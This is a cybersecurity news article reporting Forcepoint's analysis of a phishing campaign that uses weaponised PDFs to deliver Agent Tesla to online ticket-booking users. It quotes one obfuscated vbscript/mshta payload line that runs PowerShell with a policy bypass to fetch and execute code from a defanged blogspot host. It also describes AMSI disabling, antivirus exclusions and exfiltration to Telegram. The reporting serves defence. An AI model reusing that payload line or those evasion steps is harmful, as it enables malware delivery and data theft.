Hackers Attacking Online Ticket Booking Users Using Weaponized PDF Files

Threat actors use weaponized PDF files to exploit software vulnerabilities, enabling them to execute malicious code on a target system. 

PDFs provide a common and trusted format that makes them effective vehicles for delivering malware or launching phishing attacks

Moreover, their ability to embed scripts and multimedia elements also increases the potential for exploitation.

Cybersecurity researchers at Forcepoint recently discovered that hackers actively attack online ticket-booking users using weaponized PDF files.

You can analyze a malware file, network, module, and registry activity with the ANY.RUN malware sandbox, and the Threat Intelligence Lookup that will let you interact with the OS directly from the browser.

Attacking On Online Ticket Booking Users

New malware versions pop up daily, and authors keep innovating to spread it. In this tactic, threat actors lure users with attachments from various service providers.

In this new campaign, it’s been discovered that a PDF attachment that ends up downloading a RAT to infect the system is delivered via email.

Malicious PDF (Source – Forcepoint)

Here below, we have presented the execution chain:-

Execution chain (Source – Forcepoint)

Researchers analyzed PDFs for malicious attributes, and they used PDFiD for static analysis by scanning for keywords. 

The pdf-parser reveals /ObjStm hiding scripts and URLs. While the PDF employs two methods for the next-stage payload:-

  • Fake pop-up triggers URL action [/URI/Type/Action/URI (hxxps://bit[.]ly/newbookingupdates)]. Redirects to hxxps://bio0king[.]blogspot[.]com/ for JavaScript payload download.
  • Embedded vbscript ExecuteGlobal code or JavaScript for direct final-stage remote PowerShell payload.

(vbscript:ExecuteGlobal\(“CreateObject\(“”WScript.Shell””\).Run””powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$\(irm htloctmain25[.]blogspot[.]com//////////////atom.xml\) | . \(‘i*&*&&*x’\).replace\(‘*&*&&*’,’e’\);Start-Sleep -Seconds 5″”,0:Close”\))/F (\\..\\..\\..\\Windows\\System32\\mshta)>>”

PowerShell uses complex binary obfuscation and replaces the functions to hide and execute malicious scripts. It modifies registries, disables AMSI, adds AV exclusions, and bypasses security features. 

The script alters the registry, services, and firewalls, and it also injects processes like Regsvcs.exe and MSbuild.exe.

It connects to “api[.]ipify[.]org” to steal data and send it to a private Telegram chat room. The script also downloads additional payloads from “htljan62024[.]blogspot[.]com” for persistence.

After operations, it drops and executes a {random-name}.dll file, then self-deletes.

Agent Tesla malware surged during the pandemic, and its evolving tactics have persisted in recent years. The campaign involves a PDF in a phishing email from a fake travel agency. 

Opening the PDF triggers JavaScript, leading to a multi-stage PowerShell script with advanced obfuscation.

And the de-obfuscation reveals techniques for loading Agent Tesla malware. Meanwhile, successful infiltration enables data theft and command execution on compromised systems.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are extremely harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.